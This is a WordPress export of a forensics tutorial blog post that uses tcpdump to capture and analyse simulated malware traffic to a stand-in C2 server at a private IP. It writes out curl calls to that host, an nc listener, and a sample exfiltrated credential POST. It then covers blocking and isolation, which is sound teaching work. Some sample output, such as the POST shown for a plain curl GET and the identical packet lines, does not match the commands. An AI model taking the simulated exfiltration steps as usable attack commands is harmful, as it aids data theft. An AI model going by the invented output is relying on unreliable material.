{"id":22055,"date":"2025-02-23T00:05:23","date_gmt":"2025-02-23T03:05:23","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=22055"},"modified":"2025-02-23T19:25:44","modified_gmt":"2025-02-23T22:25:44","slug":"forense-digital-com-linux-tecnicas-praticas-parte-5","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/02\/exploits\/forense-digital-com-linux-tecnicas-praticas-parte-5\/","title":{"rendered":"Digital Forensics with Linux &#8211; Practical Techniques &#8211; Part 5"},"content":{"rendered":"\n<p style=\"text-align: justify;\">Network traffic analysis with <strong>tcpdump<\/strong> is a powerful technique for identifying malicious activity, such as malware communicating between two machines. In this practical example we simulate the analysis of network traffic between two machines, one of which is infected with malware that communicates with a command-and-control (C2) server.<\/p>\n<p><strong>Example scenario<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Infected machine<\/strong>: runs malware that communicates with a C2 server.<\/p>\n<\/li>\n<li>\n<p><strong>Target machine<\/strong>: the C2 server, which receives commands and sends instructions to the malware.<\/p>\n<\/li>\n<li>\n<p><strong>Tool<\/strong>: <code>tcpdump<\/code>, used to capture and analyze the network traffic.<\/p>\n<\/li>\n<\/ul>\n<p><strong>Step 1: Capture the traffic with <code>tcpdump<\/code><\/strong><\/p>\n<p><strong>1.1 Run <code>tcpdump<\/code> on the infected machine<\/strong><\/p>\n<p>On the infected machine, run the following command to capture traffic on the network interface (<code>eth0<\/code>):<\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-i<\/span> eth0 <span class=\"token parameter variable\">-w<\/span> captura.pcap<\/pre>\n<\/div>\n<ul>\n<li>\n<p><strong><code>-i eth0<\/code><\/strong>: specifies the network interface.<\/p>\n<\/li>\n<li>\n<p><strong><code>-w captura.pcap<\/code><\/strong>: saves the capture to a <code>.pcap<\/code> file for later analysis.<\/p>\n<\/li>\n<\/ul>\n<p><strong>1.2 Simulate the malware communication<\/strong><\/p>\n<p style=\"text-align: justify;\">The malware on the infected machine communicates with the C2 server on the target machine. We simulate that communication by sending suspicious packets. Start the listener on the target machine before running the <code>curl<\/code> commands, so that the connections are accepted.<\/p>\n<p><strong>On the infected machine:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">curl<\/span> http:\/\/192.168.1.100:8080\/update\n<span class=\"token function\">curl<\/span> http:\/\/192.168.1.100:8080\/data<\/pre>\n<\/div>\n<p><strong>On the target machine (C2 server):<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">nc<\/span> <span class=\"token parameter variable\">-l<\/span> <span class=\"token parameter variable\">-p<\/span> <span class=\"token number\">8080<\/span><\/pre>\n<\/div>\n<p><strong>Step 2: Analyze the captured traffic<\/strong><\/p>\n<p>After capturing the traffic, stop <code>tcpdump<\/code> (press <code>Ctrl+C<\/code>) and analyze the <code>captura.pcap<\/code> file.<\/p>\n<p><strong>2.1 Filter HTTP traffic<\/strong><\/p>\n<p>Use <code>tcpdump<\/code> to filter only the HTTP traffic (port 8080):<\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token string\">'tcp port 8080'<\/span><\/pre>\n<\/div>\n<ul>\n<li>\n<p><strong><code>-r captura.pcap<\/code><\/strong>: reads the capture file.<\/p>\n<\/li>\n<li>\n<p><strong><code>-nn<\/code><\/strong>: shows IP addresses and ports in numeric form, without DNS or service-name resolution.<\/p>\n<\/li>\n<li>\n<p><strong><code>'tcp port 8080'<\/code><\/strong>: filters only TCP traffic on port 8080.<\/p>\n<\/li>\n<\/ul>\n<p><strong>Shell output:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>14:32:01.123456 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, ack 1, win 65535, length 99\n14:32:01.123457 IP 192.168.1.100.8080 &gt; 192.168.1.200.54321: Flags [P.], seq 1:100, ack 1, win 65535, length 99\n14:32:01.123458 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, ack 1, win 65535, length 99\n14:32:01.123459 IP 192.168.1.100.8080 &gt; 192.168.1.200.54321: Flags [P.], seq 1:100, ack 1, win 65535, length 99\n...<\/pre>\n<\/div>\n<p><strong>Analysis:<\/strong><\/p>\n<ul>\n<li>\n<p>The infected machine (<code>192.168.1.200<\/code>) is communicating with the C2 server (<code>192.168.1.100<\/code>) on port <code>8080<\/code>.<\/p>\n<\/li>\n<li>\n<p>The traffic consists of <code>PUSH<\/code> packets (flags <code>[P.]<\/code>), indicating that data is being sent and received.<\/p>\n<\/li>\n<\/ul>\n<p><strong>2.2 Identify communication patterns<\/strong><\/p>\n<p>To identify communication patterns, you can count the number of packets per source IP.<\/p>\n<p><strong>Command:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token string\">'tcp port 8080'<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">awk<\/span> <span class=\"token string\">'{print $3}'<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">cut<\/span> -d. -f1-4 <span class=\"token operator\">|<\/span> <span class=\"token function\">sort<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">uniq<\/span> <span class=\"token parameter variable\">-c<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">sort<\/span> <span class=\"token parameter variable\">-nr<\/span><\/pre>\n<\/div>\n<p>The third field of each <code>tcpdump<\/code> line is the source address and port (<code>192.168.1.200.54321<\/code>); <code>cut -d. -f1-4<\/code> keeps only the four octets of the address so that packets are counted per host.<\/p>\n<p><strong>Shell output:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>1000 192.168.1.200<\/pre>\n<\/div>\n<p><strong>Analysis:<\/strong><\/p>\n<ul>\n<li>\n<p style=\"text-align: justify;\">The infected machine (<code>192.168.1.200<\/code>) is sending a large number of packets to the C2 server.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\">This is characteristic of malicious communication, in which the malware sends data or receives instructions.<\/p>\n<\/li>\n<\/ul>\n<p><strong>2.3 Analyze the request content<\/strong><\/p>\n<p>To understand the type of communication, you can inspect the content of the HTTP requests. The <code>-A<\/code> option prints each packet's payload as ASCII, which makes the HTTP headers and body readable.<\/p>\n<p><strong>Command:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token parameter variable\">-A<\/span> <span class=\"token string\">'tcp port 8080'<\/span><\/pre>\n<\/div>\n<p><strong>Shell output:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>14:32:01.123456 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, ack 1, win 65535, length 99\nE..4..@.@............P.....'...........GET \/update HTTP\/1.1\nHost: 192.168.1.100:8080\nUser-Agent: curl\/7.68.0\n...\n\n14:32:01.123457 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, ack 1, win 65535, length 99\nE..4..@.@............P.....'...........POST \/data HTTP\/1.1\nHost: 192.168.1.100:8080\nUser-Agent: curl\/7.68.0\nContent-Length: 123\nContent-Type: application\/x-www-form-urlencoded\n\nusername=admin&amp;password=secret&amp;data=exfiltrated_info<\/pre>\n<\/div>\n<p><strong>Analysis:<\/strong><\/p>\n<ul>\n<li>\n<p>The requests target specific endpoints, such as <code>\/update<\/code> and <code>\/data<\/code>.<\/p>\n<\/li>\n<li>\n<p>The body of the POST request contains sensitive data, such as <code>username<\/code>, <code>password<\/code> and <code>data=exfiltrated_info<\/code>.<\/p>\n<\/li>\n<li>\n<p>This suggests that the malware is exfiltrating information to the C2 server.<\/p>\n<\/li>\n<\/ul>\n<p><strong>Step 3: Mitigate the threat<\/strong><\/p>\n<p>Based on the analysis, you can take measures to mitigate the threat:<\/p>\n<ul>\n<li>\n<p><strong>Block the C2 server IP<\/strong>:<\/p>\n<ul>\n<li>\n<p>Use a firewall to block the IP <code>192.168.1.100<\/code>.<\/p>\n<\/li>\n<\/ul>\n<p>Example with <code>iptables<\/code>:<\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> iptables <span class=\"token parameter variable\">-A<\/span> INPUT <span class=\"token parameter variable\">-s<\/span> <span class=\"token number\">192.168.1.100<\/span> <span class=\"token parameter variable\">-j<\/span> DROP<\/pre>\n<\/div>\n<p>This rule in the <code>INPUT<\/code> chain only drops packets arriving from that address; since the malware itself opens the connections to the C2 server, add the equivalent rule to the <code>OUTPUT<\/code> chain with <code>-d 192.168.1.100<\/code> as well.<\/p>\n<\/li>\n<li>\n<p><strong>Monitor the traffic<\/strong>:<\/p>\n<ul>\n<li>\n<p>Configure alerts to detect suspicious communications with unknown IPs.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Isolate the infected machine<\/strong>:<\/p>\n<ul>\n<li>\n<p>Disconnect the infected machine from the network to prevent the malware from spreading.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Analyze the malware<\/strong>:<\/p>\n<ul>\n<li>\n<p>Use tools such as <strong>Ghidra<\/strong> or <strong>IDA Pro<\/strong> to analyze the malware binary and understand its functionality.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>Conclusion<\/strong><\/p>\n<p style=\"text-align: justify;\">In this practical example we used <code>tcpdump<\/code> to capture and analyze network traffic, identifying malicious communication between an infected machine and a C2 server. The analysis revealed suspicious HTTP requests and the exfiltration of sensitive data.<\/p>\n<p style=\"text-align: justify;\">By combining tools such as <code>tcpdump<\/code> with mitigation techniques, you can protect your systems against cyber threats and understand how malware operates on compromised networks. For more advanced analysis, consider tools such as <strong>Wireshark<\/strong> or <strong>Suricata<\/strong>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Network traffic analysis with tcpdump is a powerful technique for identifying malicious activity, such as malware communicating between two machines. In this practical example we simulate the analysis of network traffic between two machines, one of which is infected with malware that communicates with a command and [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":22059,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21],"tags":[],"class_list":["post-22055","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=22055"}],"version-history":[{"count":25,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055\/revisions"}],"predecessor-version":[{"id":22185,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055\/revisions\/22185"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/22059"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=22055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=22055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=22055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}